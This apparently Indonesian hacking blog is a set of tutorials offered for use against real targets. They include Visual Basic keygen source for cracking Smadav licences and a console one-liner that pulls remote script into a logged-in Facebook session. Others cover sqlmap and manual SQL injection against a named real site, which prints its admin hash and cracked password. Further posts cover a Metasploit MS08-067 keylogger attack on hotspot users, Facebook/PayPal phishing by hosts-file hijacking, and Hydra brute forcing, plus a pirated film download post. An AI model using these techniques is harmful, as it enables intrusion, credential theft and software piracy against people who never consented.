Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, 27 January 2013

Cara Membuat Keygen Smadav



Salam Semuanya,
Kali ini saya Viscount , akan mengshare cara membuat keygen Smadav menggunakan Visual Basic 6.0 untuk versi lain harus pandai modifikasi script

1.Pertama Buka Visual basic 6 sobat (jika sobat nggak punya bisa pake yang portable juga bisa)
Download

2.Terus pilih Standart Project.

3.Tambahkan 2 buah Textbox , dan 1 Button (Comand Button)


dengan Properties nya >>

Textbox1 >
(Name) = txtName
aligntment = 2-center
text = Username

TextBox2 >
(Name) = txtKey
aligntment = 2-center
text = Serial Key.

4.dan klik dua kali Comand Button , serta masukkan Sourcecode berikut Ini
SourceCode:
Private Sub Command1_Click()
Dim c, i, j, szCNLen As Integer
  Dim a(6) As Integer
  Dim MgcNum(21) As Integer
  Dim ssName(50) As Integer
    
  a(0) = "00"
  a(1) = "00"
  a(2) = "00"
  a(3) = "99"
  a(4) = "99"
  a(5) = "00"

  MgcNum(0) = 38: MgcNum(1) = 56
  MgcNum(2) = 57: MgcNum(3) = 57
  MgcNum(4) = 99: MgcNum(5) = 15
  MgcNum(6) = 58: MgcNum(7) = 12
  MgcNum(8) = 13: MgcNum(9) = 17
  MgcNum(10) = 19: MgcNum(11) = 18
  MgcNum(12) = 88: MgcNum(13) = 58
  MgcNum(14) = 52: MgcNum(15) = 52
  MgcNum(16) = 12: MgcNum(17) = 13
  MgcNum(18) = 12: MgcNum(19) = 57
  MgcNum(20) = 52: MgcNum(21) = 98

  szName = UCase(Trim(txtName.Text))
  szCNLen = Len(szName) - 1

  i = 0
  j = 0

  Do While i <= szCNLen
    For c = 1 To Len(szName)
      ssName(i) = Asc(Mid(szName, c, 1))
      If j > 2 Then j = 0
      a(j) = (ssName(i) * Len(szName) + a(j)) Mod &H64
      If a(j) >= &H64 Then a(j) = a(j) Mod &H64
      i = i + 1
      j = j + 1
    Next
  Loop

  i = 0
  Do While i < 5
    a(5) = ((a(5) + a(i) * Len(szName))) Mod &H16
    i = i + 1
  Loop

  a(5) = MgcNum(CInt(a(5)))

  If Trim(Len(txtName)) < 3 Then
    'MsgBox "Please input name more than 3 char", vbInformation, "Crack Smadav , Fytoko Corporation"
    txtKey.Text = "Please input name more than 3 char"
  Else
    txtKey.Text = a(3) & a(5) & a(4) & a(0) & a(1) & a(2)
  End If
End Sub

Private Sub Form_Load()
MsgBox "Created By Mr.Potensial , Thanks to Fytoko Corporation", vbInformation, "Info"
End Sub

5.Kalau Sudah DImasukkan Code Diatas Ke Comand Button , Terus Pencet F5 Untuk Debug , Dan Crack Bisa Langsung Digunaka

6.Untuk Make Project > Klik File > make Project , Dan Save

NB:Untuk Username , jangan Gunakan Spasi , Karna Di Smadav Spasi Tidak Dihitung Dalam Code Text To Hex Nya. tapi pada saat kode telah di buat sobat dapat menggunakan spasi ataupun titik, contoh sobat membuat dengan nama MrPotensial

dan untuk yg mau tahu cara buat keygennya melalui hitung secara logika/ sedikit Matematik > langsung menuju ke TKP >>>

KODE ASCII
KITA HANYA MENGGUNAKAN HURUF BESAR
MAKA BERLAKU a=A=65

A=65......F=70......K=75.......P=80.......U=85.... ...Z=90
B=66......G=71......L=76.......Q=81.......V=86
C=67......H=72......M=77......R=82.......W=87
D=68......I=73.......N=78......S=83.......X=88
E=69......J=74.......O=79......T=84.......Y=89

UNTUK KODE ASCII ANGKA 0-9

0=48......5=53
1=49......6=54
2=50......7=55
3=51......8=56
4=52......9=57

MARI KITA COBA..
UNTUK AWAL SAYA SARANKAN UNTUK MENGGUNAKAN SEDIKIT KARAKTER BIAR NDA MUMET (PUSING)
MISAL SAYA MAU CARI SN DARI NAMA : MrPotensial

TAHAP 1
**************************************************

RUMUS : ( NILAI ASCII MASING² x n ) % 100 =
Contoh "M" maka jumlah nya 1 " mengapa?? dikarnakan  hanya memiliki 1 Karakter"
M = (77 X 1) % 100 = 77 % 100 = 77 “karna nggak bisa di bagi 100 maka masih 77 hasil nya”

Contoh 2 “MR” maka jumlah nya 2 “ mengapa ?? karena memiliki 2 karakter”
M= (77 X 2) % 100 = 154 % 100 = 54 (menggunakan rumus sisa dari hasil bagi, klo blum tahu bisa dipelajari di bawah)
R= (82 X 2) %100 = 164 % 100 = 64

ket :
n = jumlah karakter
% = sisa hasil bagi
contoh mencari sisa hasil bagi :
1. 350 % 100 = 300/100 habis nga ada sisa, tinggal 50/100 jadi sisa hasil bagi = 50
2. 99 % 100 = 99/100 sisa hasil bagi = 99
(Pake Rumus pembagian waktu SD)

___________________________________________________

Langsung aja menuju contoh nya ya :

Diket :

M : (77 X 11) % 100 = 47(D1)
R : (82 X 11) % 100 = 2(D2)
P : (80 X 11) % 100 = 80(D3)

(Setiap sampai D3 maka turun kebawah lagi , dimulai dari D1')

O : (79 X 11 + 47) %100 = 16(D1')
(dari mana 47? , 47 hasil dari D1 , yang kemudian dimasukan ke D1 yang dibawah nya)
T : (70 X 11 + 2) %100 = 26(D2')
(nilai 20 Di dapat dari D2)
E : (89 X 11 + 80) % 100 = 39(D3')
(Nilai 0 Didapat Dari D3)
(Dan sama juga seperti yang diatas jika setiap sampai D3 maka turun kebawahnya , dimulai dari D1 kembali)

N : (78 X 11 + 16) %100 = 74 (D1")
(Nilai 60 Didapat Dari D1')
S : (83 X 11 + 26) %100 = 39 (D2")
I : (73X 11 + 39) %100 = 42 (D3")

A : ( 65 X 11 + 74) %100 = 89(D1"')
L : ( 76 X 11 + 39) %100 = 75(D2"')

Nah tahap 1 has ben completed atau telah selesai , hehehe, dan sekarang ambil 3 nilai dari belakang dari hasil tahap 1 tadi, yaitu “D1= 89 , D2=75 , D3=42”
Ditambah rumus ini pada awalnya 99x99

nah maka jadinya seperti ini 99X99897542

TAHAP II

RUMUS MENCARI MR.X

KITA AKAN MENGGUNAKAN 3 DATA YANG TELAH KITA DAPAT TADI [D1,D2,D3]

*********************************************

RUMUS : ( DEFAULT DATA x n ) : 22

DEFAULT DATA : [0, 0, 0, 99, 99]

ISIKAN 3 DEFAULT DATA PERTAMA DENGAN D1,D2,D3

C1 Dan C2 : Adalah Tetapan = 99

**********************************************

DEFAULT DATA YANG TELAH DI GANTI DENGAN D1,D2,D3 :

Data = D1X = 89 , D2X = 75 , D3X = 42 , C1 = 99 , C2 = 99 =>>>

D1X = (89 X 11) : 22 = 979 : 22 = 44.5 (Angka dibelakang koma di buang saja , tidak dipakai) = 44
= 44 X 22 = 968
979 - 968 = 11 (D1X)

D2X = (75 X 11 + 11 *Hasil Dari D1X*) : 22 = 836 : 22 = 38
38 X 22 = 836
836 – 836 = 0 (D2X)

D3X = ( 42 X 11 + 0 *Hasil Dari D2X*) : 22 = 462 : 22 = 21
D3X = 21 X 22 = 462
D3X = 462-462 = 0 (D3X)

C1 = ( 99 X 11 + 0) : 22 = 1089: 22 = 49.5 (Angka dibelakang koma buang saja)
C1 = 49 X 22 = 1078
C1 = 1089 - 1078 = 11 (C1X)

C2 = ( 99 X 11 + 11) : 22 = 1100 : 22 = 50 (Angka dibelakang koma buang saja)
C2 = 50 X 22 = 1100
C2 = 1100 - 1100 = 0 (C2X)

Jadi yang di ambil cuma nilai C2X saja / hasil paling akhir dari pencarian Mr.X

Dan Nilai C2X = 0 Dan Empat Dalam Mod = 38

maka hasil akhir aya adalah :

MrPotensial : 993899897542

Satuan Mod :

X0 = 38......X5=15......X10=19......X15=52......X20=52
x1 = 56......X6=58......X11=18......X16=12......X21=98
x2 = 57......X7=12......X12=88......X17=13
X3 = 57......X8=13......X13=58......X18=12
X4 = 99......X9=17......X14=52......X19=57


Nah dari pada repot repo saya akan memberikan video tutorial nya

Vidionya :
D

Reboot (2012)


Info: http://www.imdb.com/title/tt2090594/

Release Date: 2012

Genre: Short | Drama | Thriller

Stars : Emily Somers, Travis Aaron Wade and Martin Copping

Quality: 720p WEBRip

Encoder: Free@Fileem

Source: 720p.WEB-Rip.x264-crazymatt

Size: 300MB

 Reboot Synopsis
Seorang hacker perempuan muda terbangun dari peristiwa traumatik bahwa dia hampir ingat, dan iPhone terpaku pada tangannya. Di telepon, hitung mundur terus berdetak pergi ke nol. Apa yang terjadi pada nol? Siapa dia, dan mengapa ia telah menjadi perpanjangan dari perangkat? Sebagai menit centang pergi, pahlawan kami harus berpacu dengan waktu untuk menempatkan potongan sebelum, misterius tertunda nol-jam pemogokan.

 Trailer Film
 

Download Here :
SendSpace: Full Speed
Part 1
Part 2

BillionUploads:Full Speed
Part 1
Part 2





Download
Subtitle indo : Download

Friday, 12 October 2012

Auto Invite grup fb 100 % work

Assalamu'alaikum Wr. Wbr.

   
    Auto Invite Group ini dapat menambahkan semua teman dari facebook mu ke dalam group yang kamu inginkan. Hanya dengan cara simpel dan tidak perlu capek-capek untuk mengklik semua orang untuk di invite ke dalam group.

    Mungkin untuk cara ini sudah banyak yang tahu. Karena memang banyak sekali yang menggunakan seperti ini. Semoga saja cara Auto Invite Group Facebook ini bisa lebih baik dan cepat.

Cara-caranya adalah sebagai berikut :

Untuk pengguna Mozilla Firefox berikut caranya (Tested & Working)


Screen shots for Working

1. Buka Facebook. Dan login.
2. Cari Group Facebook yang ingin di tambahkan membernya dengan Auto Invite Group Facebook ini.
3. Tekan CTRL + Shift + K.
4. Isikan code dibawah ini pada kolom yang muncul :

document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/11111581612/dat.js';

5. Enter. Dan tunggu dulu dan bersabar, sampai muncul kotak warna biru.

Untuk pengguna Google Chrome berikut caranya (Not Tested)
1. Buka Facebook. Dan login.
2. Cari Group Facebook yang ingin di tambahkan membernya dengan Auto Invite Group Facebook ini.
3. Tekan CTRL + Shift + I.
4. Pilih "Select web console" (paling kanan).
5. Isikan code dibawah ini :

document.body.appendChild(document.createElement('script')).src='http://yourjavascript.com/11111581612/dat.js';

5. Enter. Dan tunggu dulu dan bersabar, sampai muncul kotak warna biru.


Mohon maaf jika dari Google Chrome belum berhasil, karena itu cara dari teman saya.
Dan saat mau test di Google Chrome, ternyata Google Chrome saya error yaitu tidak bisa loading. Mungkin teman-teman bisa membantu saya.

Wassalamu'alaikum Wr. Wbr.

Wednesday, 3 October 2012

SecurityTube Metasploit Framework Expert (SMFE) (Video Only)

SMFE
author From SecurityTube_Bot

Pliss Like Fan Page


Securitytube Metasploit Framework Expert Part 1 (Exploitation Basics)





Securitytube Metasploit Framework Expert Part 2 ( Why Metasploit? )





Securitytube Metasploit Framework Expert Part 3 ( Meterpreter Basics )





Securitytube Metasploit Framework Expert ( Armitage )





Securitytube Metasploit Framework Expert Part 4 (Framework Organization)





Securitytube Metasploit Framework Expert Part 5 (Post Exploitation Kung-Fu)





Securitytube Metasploit Framework Expert Part 6 (Post Exploitation Privilege Escalation)





Securitytube Metasploit Framework Expert Part 7 (Killing Av And Disabling Firewall)





Securitytube Metasploit Framework Expert Part 8 (Stdapi And Priv Extensions)





Securitytube Metasploit Framework Expert Part 9 (Token Stealing And Incognito)





Securitytube Metasploit Framework Expert Part 10 (Espia And Sniffer Extensions In Post Exploitation)





Securitytube Metasploit Framework Expert Part 11 (Post Exploitation Backdoors)





Securitytube Metasploit Framework Expert Part 12 (Pivoting After Post Exploitation)





Securitytube Metasploit Framework Expert Part 13 (Port Forwarding As Part Of Post Exploitation)





Securitytube Metasploit Framework Expert Part 14 (Client Side Exploits)





Securitytube Metasploit Framework Expert Part 15 (Backdoors And Rootkits In Post Exploitation)




Securitytube Metasploit Framework Expert Part 16 (Exploit Research With Metasploit)





Securitytube Metasploit Framework Expert Part 17 (Railgun Basics)






Securitytube Metasploit Framework Expert Part 18 (Railgun Adding Functions)






Securitytube Metasploit Framework Expert Part 19 (Railgun Adding New Dlls)






Securitytube Metasploit Framework Expert Part 19a (Railgun Adding New Dlls On Windows 7)






Securitytube Metasploit Framework Expert Part 20 (Resource Scripts)





Securitytube Metasploit Framework Expert Part 21 (Database Support)





Securitytube Metasploit Framework Expert Part 22 (Using Plugins)





Securitytube Metasploit Framework Expert Part 23 (Meterpreter Api Basics)





Securitytube Metasploit Framework Expert Part 24 (Meterpreter Scripting Migrate Clone)





Securitytube Metasploit Framework Expert Part 25 (Meterpreter Scripting Process Name Search)





nah sampe situ deh :D
cape juga yah
ini link asli nya
asli

Sqli Injection With Python (Sql Map)


Hai semuanya kembali lagi bersama saya Viscount , kali ini saya akan mengshare tentang salah satu tehnik dasar hacking , yaitu SQLI injection , kali ini tehnik sqli injection menggunakan python yang biasanya , software berextensio exe kali ini kita gunakan py

Sebelum memulai jangan lupa ya LIKE Fan Page Blog ini



1. Seperti biasa cari nilai Vuln nya dulu "Silahkan gunakan dork yang sudah tersedia Berpikir"


2.buat yang belum punya program python monggo silahkan download download yang 2.3.7

3.Kalo udah selsai , download SQLMAP python nya. lalu simpan di direktori PC teman "Bebas mau di taruh dimana aja D/C "

4.Buka dan tujulah ke direktori penyimpanan anda tadi "Contoh"
perintah tuju direktori dengan CMD :
d: <<< untuk menuju data d
c: <<< untuk menuju data c

cd : menggali lebih dalam direktori.Misal nya saya, menyimpan di D:\Data-gw\Penetrasi\sqlmap . makanya saya harus menggali nya dengan perintah cd "sebagai contoh : cd data-gw ENTER, cd penetrasi ENTER , cd sqlmap ENTER.
Lihat gambar berikut ini Takut :
[Image: TujuDirektoridenganCmd.png]
Mudahkan Mantab ...

5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database) "Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :
[Image: MencariDbs.png]

6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah : sqlmap.py -u SiteVuln --d database nya --tables
ENTER , Nah Munculkan banyak kan tuh Mesum , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :
[Image: EksekusiUser.png]
7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -D DataBase nya -D tabel nya --columns ,, Oke kalo udah Enter lagi , dan lihat hasil nya :
[Image: udah%2Bmenemukanuser%252Bpassadmin.png]
Ea kk , jangan berbahagia dulu Bingung soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Ngakak Biar gak penasaran , lanjut ke step berikut nya

8.Melihat isi dari kolom tersebut Bahagia Seperti biasa masukan sintaks lagi, sintakz nya adalah :
sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan Mabok . Setelah kita mendapatkan username nya, lakukan hal yang sama untuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :
[Image: Berhasil%2Bmendapatkan%2Busername%252Bpa...Badmin.png]

dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5 ^_^ ,masalah tersebut bisa di atasi pake havij Takut "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" ..

tutor dari Fr0ZhX
Official Thread 

Thursday, 20 September 2012

Pengertian tentang Hacker ,Cracker , dan Defacer

Seolah semua orang di butakan dengan pengetahuan yang minim dan saling menyalahkan, dari ilmu sendiri arti hacking cracking & defacing itu berbeda, ya walaupun semua bekerja mencari hole terobos dan lumpuhkan, tapi fungsi dari masing masing job tidak sama.
di sini ane bakal ulik arti Hacking Cracking & Defacing.

1. Hacking atau Hacker

Hacking adalah kegiatan menerobos program komputer milik orang/pihak lain. Hacker adalah orang yang gemar ngoprek komputer, memiliki keahlian membuat dan membaca program tertentu, dan terobsesi mengamati keamanan (security)-nya. “Hacker” memiliki wajah ganda; ada yang Putih atau sering di sebut White ada yang Hitam atau Black hack. “Hacker” White memberi tahu kepada programer yang komputernya diterobos, akan adanya kelemahan-kelemahan pada program yang dibuat, sehingga bisa “bocor”, agar segera Patch sistem security nya. Sedangkan, hacker Black, menerobos program orang lain untuk merusak dan mencuri datanya, tanpa memberi tahu sang pemilik, dan mungkin dia bakal meninggalkan jejak setelah mengambil semua data dengan say goodbye fo u all file has ben delete :D
2. Cracking atau Cracker (Penghancur)

Cracking adalah hacking untuk tujuan jahat. Sebutan untuk “cracker” adalah “hacker” bertopi hitam (black hat hacker). Berbeda dengan “carder” yang hanya mengintip kartu kredit, “cracker” mengintip simpanan para nasabah di berbagai bank atau pusat data sensitif lainnya untuk keuntungan diri sendiri. Meski sama-sama menerobos keamanan komputer orang lain, “hacker” lebih fokus pada prosesnya. Sedangkan “cracker” lebih fokus untuk menikmati hasilnya. Kasus kemarin, FBI bekerja sama dengan polisi Belanda dan polisi Australia menangkap seorang cracker remaja yang telah menerobos 50 ribu komputer dan mengintip 1,3 juta rekening berbagai bank di dunia. Dengan aksinya, “cracker” bernama Owen Thor Walker itu telah meraup uang sebanyak Rp1,8 triliun. “Cracker” 18 tahun yang masih duduk di bangku SMA itu tertangkap setelah aktivitas kriminalnya di dunia maya diselidiki sejak 2006. pokoknya Job seorang cracker hanya merusak merusak dan merusak, Jelas berbeda dengan hacker :D

3. Defacing atau Defacer

Defacing adalah kegiatan mengubah halaman situs/website pihak lain, seperti yang terjadi pada situs DPR kemaren, dan waktu perang cyber atau cyber war with malaysia. Tindakan deface ada yang semata-mata iseng atau pun memang dendam untuk berperang tapi melalui internet, unjuk kebolehan, pamer kemampuan membuat program, tapi ada juga yang jahat, untuk mencuri data dan dijual kepada pihak lain. dan Defacer lebih mengutamakan keselamatan, tidak seperti hacker dan cracker pada umumnya yang merusak lebih parah, defacer hanya mengubah sisi depan atau INDEX atau Home page pada website, agar si admin membenahi hole tersebut. tapi kalo ama tetangga sih ane si jas mera a.K.a Bantet selalu delete semua file dan sisakan Index page untuk kenang kenangan. heheh

Sunday, 2 September 2012

Memasang Keyloger Tanpa Meyentuh Computer Korban

 Halo Semuanya kembali lagi bersama Viscount yang ganteng :)




OK deh langsung aja, tanpa basa basi..

Peralatannya adalah :

Angry IP Scanner (Buat scanning ipaddress)

Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)

Metasploit (Sangat penting buat exploitnya)

1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee...lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :

[Image: 162750_1401465651775_1686336794_811864_4285701_n.jpg]

nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:
[Image: 148101_1401466691801_1686336794_811866_4956455_n.jpg]



liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh....sampe keakar2nya bikin intall ulang dalem hitungan detik...Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa...lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik ?msfgui? setelah kebuka dan Start, pilih ?ms08_067_netapi? di Exploit>windows>smb> , seperti gambar berikut ini:

[Image: 148893_1401467211814_1686336794_811869_3285451_n.jpg]

4. Maka akan keluar jendela pilihan OS targetnya, pilihlah ?Automatic Targeting?, seperti gambar berikut ini:

[Image: 76876_1401468051835_1686336794_811872_7263103_n.jpg]

5. Lalu scrool kebawah dan pilih ?Meterpreter>bind_tcp? , seperti gambar berikut ini:

[Image: 154307_1401469531872_1686336794_811874_6222778_n.jpg]

6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom ?RHOST? , seperti gambar berikut ini:

[Image: 162941_1401470211889_1686336794_811876_4124129_n.jpg]

Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab ?Session?, seperti gambar dibawah ini:
[Image: 76083_1401470611899_1686336794_811877_2465812_n.jpg]
8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:
[Image: 150267_1401470891906_1686336794_811878_1152151_n.jpg]

9. Maka akan keluar path tempat penyimpanan log nya berupa format ?txt? dikomputer kita, seperti gambar berikut ini:

[Image: 156342_1401471091911_1686336794_811879_6514333_n.jpg]

coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:

[Image: 162636_1401471851930_1686336794_811882_7988551_n.jpg]

10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:
[Image: 148098_1401489772378_1686336794_811897_3877593_n.jpg]

Maaf yaa ga bisa kasih bahan2nya. di mbah google banyak kok wakaka . kalo udah ada bahannya jangan lupa di share Ganteng

Semoga berguna

Sumber 
Bahagia

Sunday, 12 August 2012

hack fb account using host IP mapped based phising





Halo Semuanya Kembali lagi bersama saya Viscount, kali ini saya akan mengshare bagaimana cara menghack fb yang terbaru

langsung aja
ya

Persyaratan :

1.Facebook terbaru phisher atau Pages palsu.
DOWNLOAD phisher Latest Facebook di sini: DOWNLOAD
2. Web server hosting gratis untuk meng-upload Halaman Phish.
3. URL Spoofing menggunakan nama Host teknik pemetaan.

Izinkan ane memberikan sedikit latar belakang apa yang saya akan mengajarkan Anda hari ini. Saya tahu sebagian dari Anda sudah tahu phishing tapi untuk timer pertama, mari saya jelaskan sedikit. Halaman Phish berarti Halaman palsu yang tampak benar-benar mirip dengan halaman asli dan teknik menggunakan halaman-halaman palsu untuk kembali nama pengguna dan password orang disebut Phishing. Dan teknik yang kami gunakan untuk mengirimkan halaman-halaman palsu untuk korban dan meminta dia untuk percaya bahwa mereka adalah nyata disebut Social Engineering. Tetapi saya pikir ini kita sudah tahu, apa yang baru kita akan diskusikan hari ini .. Ahhh ... Tunggu saja karena hari ini saya akan melanggar semua kebijakan dan norma-norma etis karena sampai dan kecuali kita tidak tahu bagaimana hacker melakukan hal yang kita tidak akan pernah mampu berdiri di depan mereka.

Apa yang baru??
ane sebelum nya pernah ngasih thread HACK FACEBOOK USING TABNABBING
hampir mirip tapi ini ada yang baru silakan di simak
Kita semua tahu bahwa halaman palsu hanya dapat dideteksi dengan menggunakan dua teknik:
1. Memverifikasi URL di address bar, jika sebuah halaman palsu yang kemudian URL harus berbeda dari yang asli.
2. Menggunakan toolbar keamanan web yang memperingatkan pengguna untuk halaman palsu seperti AVG toolbar, Norton Keamanan online dll toolbar.
Tetapi bagaimana jika Anda membuka http://www.facebook.com secara manual di browser web Anda dan akan terbuka halaman palsu dan URL pada browser web tetap http://www.facebook.com saja. Itu berarti teknik pertama untuk mendeteksi halaman palsu pergi sia-sia. Sekarang untuk teknik kedua, semua toolbar web online keamanan mendeteksi halaman palsu dengan membandingkan input oleh user dalam bar alamat URL dan URL halaman asli. Jika kedua cocok maka tidak nya sebuah halaman palsu yang lain halaman malware.
Jadi teman hari ini saya akan mengajarkan cara untuk membuat halaman palsu Anda terbuka setiap kali korban membuka Facebook di / nya web browser-nya. Ahhh ... Anda akan sekarang berpikir mustahil. Tapi seperti yang saya telah katakan saya telah menulis sebuah kertas putih pada teknik Phishing Advanced. Jadi 110% yang mungkin untuk memuat halaman web palsu setiap kali pengguna membuka http://www.facebook.com atau situs lainnya seperti Yahoo, Hotmail atau apapun ...

Langkah untuk hack akun Facebook atau Password:

1. Download phisher Facebook terbaru.
2. Ekstrak file, Anda akan mendapatkan 4 file di bawah ini:

index.php
facebook1.php
passwords.html
thanks.php

3. Sekarang pergi ke server web hosting gratis web untuk meng-upload halaman-halaman palsu.
Perhatikan semua harus di-upload pada akarnya berarti tidak dalam folder apapun. Tepat pada direktori tingkat pertama.

4. Sekarang Anda harus menemukan alamat IP yang benar dari account yang telah Anda buat di server web hosting.
5. Ketika Anda mendapatkan alamat IP halaman palsu, sekarang apa yang perlu kita lakukan adalah bahwa kita harus menambahkan entri dari alamat IP terhadap http://www.facebook.com di file host korban yang terletak di bawah lokasi.


Code:
C:\Windows\System32\drivers\etc

6. Ada beberapa cara untuk melakukan itu, di situs itu tidak di share script nya  maaf akang". Jadi saya menjelaskan Anda logika dan sisanya Anda perlu mencari tahu bagaimana Anda akan mengedit file host dan korban menambahkan Halaman Palsu alamat IP terhadap http://www.facebook.com.

7. Sekarang setelah melakukan langkah 5 dan 6, setiap kali pengguna membuka http://www.facebook.com, halaman palsu Facebook Anda akan terbuka dan korban tidak akan pernah bisa untuk mengunjungi Facebook asli, sehingga ia tidak dapat bahkan mampu mengubah password ...: P

8.pesan dari sang penulis:
I have added an extra logic to my scripts, whenever victim enter the password and hit enter button, i am removing the entry of Fake IP address against http://www.facebook.com from the host file by making it spaces. So it will be for him for one time only which sounds more spoofed. Its just a single line code but i cannot tell you guys because it will make this article completely unethical.
Saya akan mengajarkan Anda teknik-teknik tetapi saya tidak akan melakukan makan sendok karena jika Anda ingin menjadi hacker yang baik maka Anda perlu menggunakan otak Anda juga. Saya suka disebut Merusak tetapi saya melakukan pekerjaan konstruktif ..: P seperti ini ... rofl ...

9. Segala sesuatu yang lain dari ini mirip dengan teknik phishing yang normal ..

maafin saya akang" karna thread ini mungkin rada ruwet Mentok tapi ane udah nyari video yg mirip dengan cara ini semoga bsa menjadi referensi dan bisa membantu

VIDEO 1 :






VIDEO 2 :





sumber : Disini


Sunday, 29 July 2012

Symlink Tutorial

hello all

back again with me viscount
yes sorry I rarely update my blog post on because I was busy lately.
but this time I will update the symlink in the way our website has been hacked
, This method should not be misused in this way is actually very beneficial to the progress of the cyber world


This video link was

Link 

Tuesday, 19 June 2012

Tutor Proof of Concept SQL Injection ISES International


Immediately wrote it step by step

Error found on:
http://www.ises.org.au/page-content.php?...er+by+15--

Looking for an error number that appears:
http://www.ises.org.au/page-content.php?...12,13,14--

that comes out is the number 2

Finding MySQL version:
http://www.ises.org.au/page-content.php?...12,13,14--

Looking for table:
http://www.ises.org.au/page-content.php?...1,12,13,14 from infomation_schema.tables where table_schema=database()--

Finding Column from the table that have been found:
http://www.ises.org.au/page-content.php?...1,12,13,14 from infomation_schema.columns where table_name=0x61646d696e5f7573657273--

extract the username and password:
http://www.ises.org.au/page-content.php?...in_users--

admin:d69c4ecbdef93cb7b81232bcaaaf917a

decrypt password dari d69c4ecbdef93cb7b81232bcaaaf917a is babyvon

Admin Login Page:
http://www.ises.org.au/admin/

Happy Hacking! ketawa

Friday, 15 June 2012

Hack Facebook AOL Paypal Accounts Using Super Phisher 2012

Jadi hari ini saya akan membuat artikel lain di Akun Facebook hacker menggunakan phisher Super. Banyak pembaca lelah dari mendapatkan kode sumber dari login dan membuat sumber daya phishing. Tapi hari ini saya akan menunjukkan cara untuk membuat phisher situs secara otomatis.

[Image: One-AOL-Phisher-Sent-to-Jail-While-Anoth...tion-2.jpg]

Cara Setup phisher Super?

Langkah 1. Download Dari sini (Password: - hackingguide) & Instal di komputer Anda.
Step2. Koneksi Internet Anda harus berada di.
Step3. Jalankan perangkat lunak.
Step4. Pilih phishing Anda sendiri situs seperti facebook.com twitter.com paypal.com dll
Step5. Nama file password harus password.txt, nama php harus login.php.
Step6. Situs untuk mengarahkan akan menjadi situs yang terpilih seperti Anda jika Anda membuat halaman login facebook, Anda harus redirect ke facebook.com.

[Image: SuperPhisher1.png]

Step7. Tekan Tombol Build phisher, thats it. Sekarang akan membuat file output di C: drive.
[Image: SuperPhisher2.png]

Step8. Upload Them to any free host or paid and get your victim's private data including emails & passwords. Upload Mereka untuk semua host gratis atau dibayar dan mendapatkan data pribadi korban anda termasuk email & password.

Good luck ^^

THC-Hydra Version 7.3 For Window

Halo Semuanya Kali ini saya akan memberikan  software THC-Hydra terbaru versi 7.3 untuk windows nih. Yang mau download silahkan disini !

Saya kasih tahu sedikit cara penggunaannya.
Saya kasih contoh untuk brute FTP.

$ hydra -l username -p password http://ftp.target.com ftp
Hydra v7.3 ©2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-06-05 20:05:38
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1 login: username password: password
[STATUS] attack finished for http://ftp.target.com (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-06-05 20:05:40

Ini contoh kalo pake wordlists

$ hydra -l username -P password.txt http://ftp.target.com ftp
Hydra v7.3 ©2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-06-05 20:05:38
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1 login: username password: password
[STATUS] attack finished for http://ftp.target.com (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-06-05 20:05:40

Enjoy!

Diamond hack Vuln

Nama'y Diamond hack Vuln. Hmmm...yang pasti tool ini bkn wat nyari berlian ea. Kegunaan Tool ini wat nyari web yg vulnerability.
Cara pake'y bisa langsung Copas URL web yg mo di cek Vuln or Not Ato bisa menggunakan Dork.

Pripiuw'y kayak begindang :

